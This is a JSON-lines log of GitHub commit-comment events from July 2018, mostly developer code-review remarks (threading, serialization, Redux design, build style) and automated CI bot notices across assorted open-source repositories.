{"id":"7938764986","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644459,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:34:06Z","updated_at":"2018-07-09T16:34:06Z","author_association":"CONTRIBUTOR","body":"I have never profiled it, but from what I've heard atomics *could* be more of a problem on ARM as they actually require a memory barrier instruction, and shared pts issue one on destruction. Ideally I wanted to refactor this class so task groups can work with thousands of objects, but in that case it's probably best to split the work in batches instead of generating a task for every one anyway."}},"created_at":"2018-07-09T16:34:06Z"}
{"id":"7938765801","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/greasemonkey"},"payload":{"comment":{"id":29644461,"position":null,"line":null,"path":null,"commit_id":"67775b19e8192658b338228531eb1f9ae750fe0f","created_at":"2018-07-09T16:34:16Z","updated_at":"2018-07-09T16:34:16Z","author_association":"OWNER","body":"https://github.com/violentmonkey/violentmonkey/issues/426\r\n"}},"created_at":"2018-07-09T16:34:16Z"}
{"id":"7938766654","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644466,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T16:34:26Z","updated_at":"2018-07-09T16:34:26Z","author_association":"CONTRIBUTOR","body":"Btw, unrelated to that, but it just occurred to me to ask. Is your rtti serialization code endianness aware?"}},"created_at":"2018-07-09T16:34:26Z"}
{"id":"7938772139","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29644481,"position":null,"line":null,"path":null,"commit_id":"98ddca0b2b63516394d5f5d9935bc3a3a2800583","created_at":"2018-07-09T16:35:26Z","updated_at":"2018-07-09T16:35:26Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-servi](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-servi).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-servi-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T16:35:26Z"}
{"id":"7938775427","type":"CommitCommentEvent","actor":{"login":"KeithMyers"},"repo":{"name":"groeck/it87"},"payload":{"comment":{"id":29644489,"position":null,"line":null,"path":null,"commit_id":"40bec4b5a7896d4406d2a7d095d06c0624c24aca","created_at":"2018-07-09T16:36:04Z","updated_at":"2018-07-09T16:36:04Z","author_association":"NONE","body":"Thank your for your past efforts.  Sorry to hear of your frustration and need to remove the driver."}},"created_at":"2018-07-09T16:36:04Z"}
{"id":"7938777178","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644491,"position":null,"line":null,"path":null,"commit_id":"348bc7e94d61f3b4dfc417bfd0a5d6aca0c56466","created_at":"2018-07-09T16:36:24Z","updated_at":"2018-07-09T16:36:24Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4418)*\n"}},"created_at":"2018-07-09T16:36:24Z"}
{"id":"7938779469","type":"CommitCommentEvent","actor":{"login":"BearishSun"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644496,"position":56,"line":288,"path":"Source/Foundation/bsfCore/Particles/BsParticleSystem.cpp","commit_id":"c15a49e2d44977484382edb4dea9d2a7d394aa34","created_at":"2018-07-09T16:36:51Z","updated_at":"2018-07-09T16:36:51Z","author_association":"CONTRIBUTOR","body":"I'm starting to enjoy it as well, but I always worry about it bloating the binary size.\r\n\r\nIt's not endianess aware."}},"created_at":"2018-07-09T16:36:51Z"}
{"id":"7938783330","type":"CommitCommentEvent","actor":{"login":"rochukuba"},"repo":{"name":"rochukuba/Rochuuu"},"payload":{"comment":{"id":29644508,"position":null,"line":null,"path":null,"commit_id":"4fc01499c280a0e5b391b3278ab141e34eb0acad","created_at":"2018-07-09T16:37:37Z","updated_at":"2018-07-09T16:37:37Z","author_association":"OWNER","body":"![okladka](https://user-images.githubusercontent.com/40770386/42463695-2333af08-83a7-11e8-9852-f804750117cb.jpg)\r\n"}},"created_at":"2018-07-09T16:37:37Z"}
{"id":"7938783702","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644509,"position":null,"line":null,"path":null,"commit_id":"2a1630939becb6612d449ade8875bd086c5f60b5","created_at":"2018-07-09T16:37:42Z","updated_at":"2018-07-09T16:37:42Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4419)*\n"}},"created_at":"2018-07-09T16:37:42Z"}
{"id":"7938786967","type":"CommitCommentEvent","actor":{"login":"webAnatoly"},"repo":{"name":"webAnatoly/understading_redux"},"payload":{"comment":{"id":29644515,"position":null,"line":null,"path":null,"commit_id":"69e23530fa2ee4157bac57b31a29cd2b10c37c8d","created_at":"2018-07-09T16:38:21Z","updated_at":"2018-07-09T16:38:21Z","author_association":"OWNER","body":"Action creators are great for running async code when you dispatch an action.\r\nReducers only are able to run synchronous code.\r\n"}},"created_at":"2018-07-09T16:38:21Z"}
{"id":"7938787365","type":"CommitCommentEvent","actor":{"login":"halonazhao"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644516,"position":38,"line":114,"path":"code/Example/Drasil/GamePhysics/Body.hs","commit_id":"b99a40fcbf731fbb5f2465b2eaa6cf19499d5488","created_at":"2018-07-09T16:38:26Z","updated_at":"2018-07-09T16:38:26Z","author_association":"COLLABORATOR","body":"This is in the current file.`instance Eq            DefinedQuantityDict where a == b = (a ^. uid) == (b ^. uid)`\r\nI don't quite understand why `nubBy` is better. If I write the function that nubBy should take, I would use the same logic to see whether `DefinedQuantityDict` have the same uid. But `Eq` has shown this function, why rewrite? Do you mean `nubBy (\\x y -> (x ^. uid) == (y ^.uid)) [DefinedQuantityDict]` @JacquesCarette "}},"created_at":"2018-07-09T16:38:26Z"}
{"id":"7938787536","type":"CommitCommentEvent","actor":{"login":"webAnatoly"},"repo":{"name":"webAnatoly/understading_redux"},"payload":{"comment":{"id":29644517,"position":null,"line":null,"path":null,"commit_id":"69e23530fa2ee4157bac57b31a29cd2b10c37c8d","created_at":"2018-07-09T16:38:28Z","updated_at":"2018-07-09T16:38:28Z","author_association":"OWNER","body":"I lean towards putting the logic into the reducer and not too much logic into the action creator. Asynchronous code has to go there (ActionCreator) but once you got back the data from the server you might need to reach out you can of course transform it in the action Creator and you should do that to a certain extent but once you've got data that is relatively clean you should hand it off to the producer. And if you still need to manipulate it for example by taking 8 times to or anything like that in my opinion that should go into the reducer.\r\n\r\nNow you will also find arguments for the other side and in the end it's your decision if you choose one approach stick to it though don't change it. Don't put a lot of logic in one action creator just don't have a lot of logic and a number reducer. Be consistent and decide where do you want to transform and prepare your data, in action creator or reduce. I recommend the later, but ultimately it's up to you."}},"created_at":"2018-07-09T16:38:28Z"}
{"id":"7938791234","type":"CommitCommentEvent","actor":{"login":"toebbel"},"repo":{"name":"prismagraphql/prisma"},"payload":{"comment":{"id":29644527,"position":117,"line":117,"path":"docs/1.11/03-Tutorials2/01-Setup-Prisma/02-Create-New-DB/01-MySQL.md","commit_id":"9c8e316f7c2285362a48bbbd770390462ee3ea6d","created_at":"2018-07-09T16:39:11Z","updated_at":"2018-07-09T16:39:11Z","author_association":"NONE","body":"I guess this should not be pointing to localhost? "}},"created_at":"2018-07-09T16:39:11Z"}
{"id":"7938792467","type":"CommitCommentEvent","actor":{"login":"george521"},"repo":{"name":"george521/StupidQuiz"},"payload":{"comment":{"id":29644535,"position":null,"line":null,"path":null,"commit_id":"74f33d0570c80524c26aac6808d47b9a32397710","created_at":"2018-07-09T16:39:25Z","updated_at":"2018-07-09T16:39:25Z","author_association":"OWNER","body":"Implemented new choice at main menu"}},"created_at":"2018-07-09T16:39:25Z"}
{"id":"7938793051","type":"CommitCommentEvent","actor":{"login":"lincolnfrog"},"repo":{"name":"ddorwin/hit-test"},"payload":{"comment":{"id":29644538,"position":15,"line":131,"path":"explainer.md","commit_id":"cfb28267e4f9babcbefbfad17a9193fd83a189db","created_at":"2018-07-09T16:39:32Z","updated_at":"2018-07-09T16:39:32Z","author_association":"NONE","body":"I think we should call this flag \"AR\""}},"created_at":"2018-07-09T16:39:32Z"}
{"id":"7938793300","type":"CommitCommentEvent","actor":{"login":"lt-holman"},"repo":{"name":"Wind-River/device-cloud-lib"},"payload":{"comment":{"id":29644539,"position":5,"line":19,"path":"src/relay/CMakeLists.txt","commit_id":"7ccb248898d6cc91fc2b01f5f8b942be8c3133cb","created_at":"2018-07-09T16:39:35Z","updated_at":"2018-07-09T16:39:35Z","author_association":"COLLABORATOR","body":"we shouldn't need this.  all json stuff is now in utilties... saying JSMN is required breaks this functionality."}},"created_at":"2018-07-09T16:39:35Z"}
{"id":"7938795990","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644547,"position":null,"line":null,"path":null,"commit_id":"2c5a2e5c4dcc9d504251a45ef97f47af3dae8279","created_at":"2018-07-09T16:40:08Z","updated_at":"2018-07-09T16:40:08Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4420)*\n"}},"created_at":"2018-07-09T16:40:08Z"}
{"id":"7938798306","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29644551,"position":null,"line":null,"path":null,"commit_id":"98c674cfd847983fa17c15c2c95110531b577d4a","created_at":"2018-07-09T16:40:36Z","updated_at":"2018-07-09T16:40:36Z","author_association":"COLLABORATOR","body":"@JacquesCarette Is it alright to inline them for now in this branch and divide up the task of making labels for each of the sections into the \"label database\" once this branch is merged?"}},"created_at":"2018-07-09T16:40:36Z"}
{"id":"7938800031","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29644555,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-09T16:40:57Z","updated_at":"2018-07-09T16:40:57Z","author_association":"COLLABORATOR","body":"`$row['name'] = 'SQ'.subqName;` this can **NEVER** work …\r\n\r\nElse : rework totally TSV seems more a refactoring … since we don't have a TSV with ranking from 2.73 : we can not really test. But i'm sure its don't really broke survey … with the fix from the pull request …\r\n"}},"created_at":"2018-07-09T16:40:57Z"}
{"id":"7938800358","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"OpenGreekAndLatin/First1KGreek"},"payload":{"comment":{"id":29644556,"position":null,"line":null,"path":null,"commit_id":"261d3600ecd363815f1c2c83c583aa040bd0fcc6","created_at":"2018-07-09T16:41:01Z","updated_at":"2018-07-09T16:41:01Z","author_association":"NONE","body":"\n\n*[Hook UI build recap](http://ci.perseids.org/repo/OpenGreekAndLatin/First1KGreek/4421)*\n"}},"created_at":"2018-07-09T16:41:01Z"}
{"id":"7938801204","type":"CommitCommentEvent","actor":{"login":"redphoenix948"},"repo":{"name":"redphoenix948/Newthing"},"payload":{"comment":{"id":29644561,"position":null,"line":null,"path":null,"commit_id":"8aa1b11dd8c0af64eaec9484bd76874b104f9ddb","created_at":"2018-07-09T16:41:12Z","updated_at":"2018-07-09T16:41:12Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-09T16:41:12Z"}
{"id":"7938801209","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":29644560,"position":null,"line":null,"path":null,"commit_id":"7af5a0cdf484b0d6534024d02e07eda16340a50f","created_at":"2018-07-09T16:41:12Z","updated_at":"2018-07-09T16:41:12Z","author_association":"CONTRIBUTOR","body":"Ah, right. I wasn't sure if you were okay with editing the library, or if you'd think it was a lazy hack. I'll go with that then, since it should work on both MinGWs."}},"created_at":"2018-07-09T16:41:12Z"}
{"id":"7938805760","type":"CommitCommentEvent","actor":{"login":"fdrtec"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29644571,"position":5,"line":5,"path":"otus-persistence/src/test/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDaoBeanTest.java","commit_id":"7c3f36782b6299dbdb513c840791fbd3c4f3fa45","created_at":"2018-07-09T16:42:08Z","updated_at":"2018-07-09T16:42:08Z","author_association":"CONTRIBUTOR","body":"este unit test foi feito posteriormente em https://github.com/ccem-dev/otus-api/commit/7c3f36782b6299dbdb513c840791fbd3c4f3fa45#commitcomment-29643753"}},"created_at":"2018-07-09T16:42:08Z"}
{"id":"7938807731","type":"CommitCommentEvent","actor":{"login":"T1mpp4"},"repo":{"name":"Spirtix/android_device_huawei_HWPLK"},"payload":{"comment":{"id":29644580,"position":null,"line":null,"path":null,"commit_id":"180f7325402d1ceb713bc0ffff890e38d965796f","created_at":"2018-07-09T16:42:30Z","updated_at":"2018-07-09T16:42:30Z","author_association":"CONTRIBUTOR","body":"https://github.com/T1mpp4/android_kernel_huawei_hi3635/commits/nougat-stable\r\n\r\nNot newest yet. Sometime I will pick the rest."}},"created_at":"2018-07-09T16:42:30Z"}
{"id":"7938808353","type":"CommitCommentEvent","actor":{"login":"sywka"},"repo":{"name":"gsbelarus/gdmn-back"},"payload":{"comment":{"id":29644584,"position":8,"line":7,"path":"README.md","commit_id":"3af606043982163e72fabee5e80f59cc3905e87f","created_at":"2018-07-09T16:42:37Z","updated_at":"2018-07-09T16:42:37Z","author_association":"COLLABORATOR","body":"точно, забыл)"}},"created_at":"2018-07-09T16:42:37Z"}
{"id":"7938810956","type":"CommitCommentEvent","actor":{"login":"lt-holman"},"repo":{"name":"Wind-River/device-cloud-lib"},"payload":{"comment":{"id":29644594,"position":9,"line":21,"path":"src/api/json/iot_json_base.c","commit_id":"7ccb248898d6cc91fc2b01f5f8b942be8c3133cb","created_at":"2018-07-09T16:43:10Z","updated_at":"2018-07-09T16:43:10Z","author_association":"COLLABORATOR","body":"Leave the ../public/iot_json.h include... instead of moving it."}},"created_at":"2018-07-09T16:43:10Z"}
{"id":"7938818680","type":"CommitCommentEvent","actor":{"login":"akashvacher"},"repo":{"name":"akashvacher/kafka-tools"},"payload":{"comment":{"id":29644610,"position":null,"line":null,"path":null,"commit_id":"2228e65f43ce86b28bae8b32e35ad703d54a18a0","created_at":"2018-07-09T16:44:42Z","updated_at":"2018-07-09T16:44:42Z","author_association":"OWNER","body":"The other change in this commit is just to get rid of the remaining flake8 errors."}},"created_at":"2018-07-09T16:44:42Z"}
{"id":"7938820634","type":"CommitCommentEvent","actor":{"login":"lt-holman"},"repo":{"name":"Wind-River/device-cloud-lib"},"payload":{"comment":{"id":29644621,"position":20,"line":36,"path":"src/utilities/CMakeLists.txt","commit_id":"7ccb248898d6cc91fc2b01f5f8b942be8c3133cb","created_at":"2018-07-09T16:45:07Z","updated_at":"2018-07-09T16:45:07Z","author_association":"COLLABORATOR","body":"Alphabetical order."}},"created_at":"2018-07-09T16:45:07Z"}
{"id":"7938822525","type":"CommitCommentEvent","actor":{"login":"mohawkjohn"},"repo":{"name":"Arafatk/magick-rubyplot"},"payload":{"comment":{"id":29644629,"position":2,"line":2,"path":"spec/bezier_spec.rb","commit_id":"30f6684440f6660fe46445fcbe5df57e645eae99","created_at":"2018-07-09T16:45:30Z","updated_at":"2018-07-09T16:45:30Z","author_association":"NONE","body":"If these plots don't pass yet, put `pending` in as the first line so they don't fail."}},"created_at":"2018-07-09T16:45:30Z"}
{"id":"7938823104","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29644631,"position":null,"line":null,"path":null,"commit_id":"0e66cd981417faf28ba1ba402d8f00b51b555b1a","created_at":"2018-07-09T16:45:37Z","updated_at":"2018-07-09T16:45:37Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-439](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-439).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-439-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-09T16:45:37Z"}
{"id":"7938824147","type":"CommitCommentEvent","actor":{"login":"Joelcaaa"},"repo":{"name":"Joelcaaa/PYGAME"},"payload":{"comment":{"id":29644638,"position":189,"line":445,"path":".gitignore/.gitignore","commit_id":"9c3ee503315e819cac6da0c916b5c0e0871e55fe","created_at":"2018-07-09T16:45:49Z","updated_at":"2018-07-09T16:45:49Z","author_association":"OWNER","body":"Creo que algunas lineas de codigo no son necesarias"}},"created_at":"2018-07-09T16:45:49Z"}
{"id":"7938824828","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644641,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:45:57Z","updated_at":"2018-07-09T16:45:57Z","author_association":"CONTRIBUTOR","body":"Thousands of objects is certainly a good goal.\r\n\r\nI'm not sure about the perf on Arm, but I can certainly believe it.\r\n\r\nThe major challenge here is that you still fundamentally need to support some kind of multi-threading, or you'll, well, only ever use a single thread. (Or is that what you want? If so, see second comment).\r\n\r\nAn alternative could be to use two atomic stacks (Not sure that there's something like this in the STL, but it's relatively easy to write using atomic_compare_exchange functions) one for work-to-be-done, and another for results of that work.\r\n\r\nsomething like\r\n\r\nmain-thread splits all of the tasks up into different chunks. How you group the chunks is probably a phd worthy research project, but maybe someone's got some data out there about it.\r\n\r\nEach chunk can have 1 to many tasks in it.\r\n\r\nPost all of the chunks to an atomic-stack (incurs atomic compare-exchange).\r\n\r\nEach worker thread reads from the atomic stack. Executes everything in the chunk. Creates a result object (Probably want to reuse the work-chunk object's memory if it's sized properly), posts that to the result stack. Main thread pulls from the result stack analyzes results, creates new tasks as needed, posts back to queue.\r\n\r\nThis (hopefully) allows you to minimize the number of atomic operations.\r\n\r\nIf you have a particularly pathological set of tasks, I suppose this might result in more atomic operations (One to push to queue, another to read from queue, then repeat for results). But if I'm thinking of this right it would be something where you have multiple different series of tasks that are all linear in nature, but at each \"step\" of each series the current task depends on *all* of the results of the previous \"step\". I can't imagine that will be very common.\r\n\r\nAs long as you can always schedule two tasks in the same \"chunk\", hopefully because one depends on the previous, i think you'll break even. If you can schedule more than 2 tasks in a chunk, you'll come out ahead. Probably."}},"created_at":"2018-07-09T16:45:57Z"}
{"id":"7938826454","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29644644,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-09T16:46:16Z","updated_at":"2018-07-09T16:46:16Z","author_association":"OWNER","body":"https://github.com/kapillamba4/permalink-bot/tree/master/test"}},"created_at":"2018-07-09T16:46:16Z"}
{"id":"7938826804","type":"CommitCommentEvent","actor":{"login":"karolmajek"},"repo":{"name":"michalpelka/optris_drivers"},"payload":{"comment":{"id":29644645,"position":4,"line":97,"path":"src/OptrisImager.h","commit_id":"b568faba235503e36abf6c9dce19dc6f953cd5cd","created_at":"2018-07-09T16:46:20Z","updated_at":"2018-07-09T16:46:20Z","author_association":"NONE","body":"Tu mam problem, a oryginalne się kompiluje.\r\nDam już radę, dzięki!"}},"created_at":"2018-07-09T16:46:20Z"}
{"id":"7938828008","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-bot-testing-playground"},"payload":{"comment":{"id":29644648,"position":null,"line":null,"path":null,"commit_id":"a746c1481d6d4c0f268f9970e583ce8a205c978f","created_at":"2018-07-09T16:46:34Z","updated_at":"2018-07-09T16:46:34Z","author_association":"OWNER","body":"https://github.com/"}},"created_at":"2018-07-09T16:46:34Z"}
{"id":"7938830536","type":"CommitCommentEvent","actor":{"login":"lt-holman"},"repo":{"name":"Wind-River/device-cloud-lib"},"payload":{"comment":{"id":29644655,"position":11,"line":51,"path":"src/relay/relay_main.c","commit_id":"7ccb248898d6cc91fc2b01f5f8b942be8c3133cb","created_at":"2018-07-09T16:47:06Z","updated_at":"2018-07-09T16:47:06Z","author_association":"COLLABORATOR","body":"1) Alphabetical order... 2) align new comments.\r\n"}},"created_at":"2018-07-09T16:47:06Z"}
{"id":"7938833609","type":"CommitCommentEvent","actor":{"login":"lt-holman"},"repo":{"name":"Wind-River/device-cloud-lib"},"payload":{"comment":{"id":29644661,"position":600,"line":676,"path":"src/control/control_config.c","commit_id":"7ccb248898d6cc91fc2b01f5f8b942be8c3133cb","created_at":"2018-07-09T16:47:42Z","updated_at":"2018-07-09T16:47:42Z","author_association":"COLLABORATOR","body":"should be iot_bool_t."}},"created_at":"2018-07-09T16:47:42Z"}
{"id":"7938833996","type":"CommitCommentEvent","actor":{"login":"StaceyWhitmore"},"repo":{"name":"StaceyWhitmore/myPortfolio"},"payload":{"comment":{"id":29644662,"position":null,"line":null,"path":null,"commit_id":"78dd8354f6bd4488857994d0370791b735306991","created_at":"2018-07-09T16:47:46Z","updated_at":"2018-07-09T16:47:46Z","author_association":"OWNER","body":"Using pure CSS for Slider\r\n"}},"created_at":"2018-07-09T16:47:46Z"}
{"id":"7938834664","type":"CommitCommentEvent","actor":{"login":"NicolasRannou"},"repo":{"name":"FNNDSC/fnndsc"},"payload":{"comment":{"id":29644663,"position":null,"line":null,"path":null,"commit_id":"ee9842d03a2e0b106e4e63c4f2583bf316180513","created_at":"2018-07-09T16:47:53Z","updated_at":"2018-07-09T16:47:53Z","author_association":"MEMBER","body":"Looking good @jbernal0019 😎 \r\n"}},"created_at":"2018-07-09T16:47:53Z"}
{"id":"7938834861","type":"CommitCommentEvent","actor":{"login":"fdrtec"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29644664,"position":5,"line":5,"path":"otus-persistence/src/test/java/br/org/otus/laboratory/participant/ParticipantLaboratoryDaoBeanTest.java","commit_id":"7c3f36782b6299dbdb513c840791fbd3c4f3fa45","created_at":"2018-07-09T16:47:55Z","updated_at":"2018-07-09T16:47:55Z","author_association":"CONTRIBUTOR","body":"comentário foi removido em https://github.com/ccem-dev/otus-api/commit/8ecd044b8ff402bd075f13be59c5731b62166573"}},"created_at":"2018-07-09T16:47:55Z"}
{"id":"7938834988","type":"CommitCommentEvent","actor":{"login":"lt-holman"},"repo":{"name":"Wind-River/device-cloud-lib"},"payload":{"comment":{"id":29644665,"position":563,"line":642,"path":"src/control/control_config.c","commit_id":"7ccb248898d6cc91fc2b01f5f8b942be8c3133cb","created_at":"2018-07-09T16:47:57Z","updated_at":"2018-07-09T16:47:57Z","author_association":"COLLABORATOR","body":"should be iot_bool_t\r\n"}},"created_at":"2018-07-09T16:47:57Z"}
{"id":"7938836390","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644668,"position":null,"line":null,"path":null,"commit_id":"180733418ecf4c8e7a64b6e2cbed64051b01d43d","created_at":"2018-07-09T16:48:13Z","updated_at":"2018-07-09T16:48:13Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `ddfd7d9c-8397-11e8-8c2e-0146032223b0`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:48:13Z"}
{"id":"7938838179","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29644672,"position":37,"line":121,"path":"Source/Foundation/bsfUtility/Threading/BsTaskScheduler.cpp","commit_id":"2008b5d9e13798f9afce5499d34daafddd91c047","created_at":"2018-07-09T16:48:35Z","updated_at":"2018-07-09T16:48:35Z","author_association":"CONTRIBUTOR","body":"If, instead, you're trying to make this whole thing run in a single-threaded way, you could create a new smart pointer class that uses non-atomic reference counting.\r\n\r\nMy day job has custom smart pointers (which I maintain, but I didn't originally create). We have one for multi-threaded reference counting, and another for single-threaded. The single threaded case is still interesting because you can safely pass the non-atomic refcount smart pointers to other threads, so long as you use message passing (or mutexes). And this allows the programmar to not have to worry so much about memory leaks. But you've gotta be really careful not to use the non-atomic version across threads, and to always destruct on the \"right\" thread for objects that are from a memory pool and similar.\r\n\r\nI think you're going for multi-threaded though, so that's not all that useful to do."}},"created_at":"2018-07-09T16:48:35Z"}
{"id":"7938841080","type":"CommitCommentEvent","actor":{"login":"dougshell"},"repo":{"name":"dguzek/Simply-Love-SM5"},"payload":{"comment":{"id":29644686,"position":null,"line":null,"path":null,"commit_id":"cc0da16e8d050d8d420100393b8ebc6930fa59bf","created_at":"2018-07-09T16:49:09Z","updated_at":"2018-07-09T16:49:09Z","author_association":"NONE","body":"Didn't make the cut, jkjk\r\n\r\nGreat job on the clean up , bug fixes, and improvements!!!"}},"created_at":"2018-07-09T16:49:09Z"}
{"id":"7938848166","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Temboyo007/playerhead"},"payload":{"comment":{"id":29644702,"position":null,"line":null,"path":null,"commit_id":"7823faf864d339488949222e5730e734c29b4968","created_at":"2018-07-09T16:50:33Z","updated_at":"2018-07-09T16:50:33Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): scanning error\nencountered during parsing: could not find expected ':' (line 6, column 7),\ncontext while scanning a simple key (line 5, column 1) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Temboyo007/playerhead/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `31424064-8398-11e8-84b0-cb97e8ee11ab`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-09T16:50:33Z"}
{"id":"7938851017","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29644704,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T16:51:06Z","updated_at":"2018-07-09T16:51:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T16:51:06Z"}
{"id":"7938857519","type":"CommitCommentEvent","actor":{"login":"acowley"},"repo":{"name":"VinylRecords/Vinyl"},"payload":{"comment":{"id":29644719,"position":null,"line":null,"path":null,"commit_id":"dc2dfba6610815eb27de763b88920c43682c0dab","created_at":"2018-07-09T16:52:25Z","updated_at":"2018-07-09T16:52:25Z","author_association":"CONTRIBUTOR","body":"Thanks for letting me know! I'll push a fix shortly."}},"created_at":"2018-07-09T16:52:25Z"}
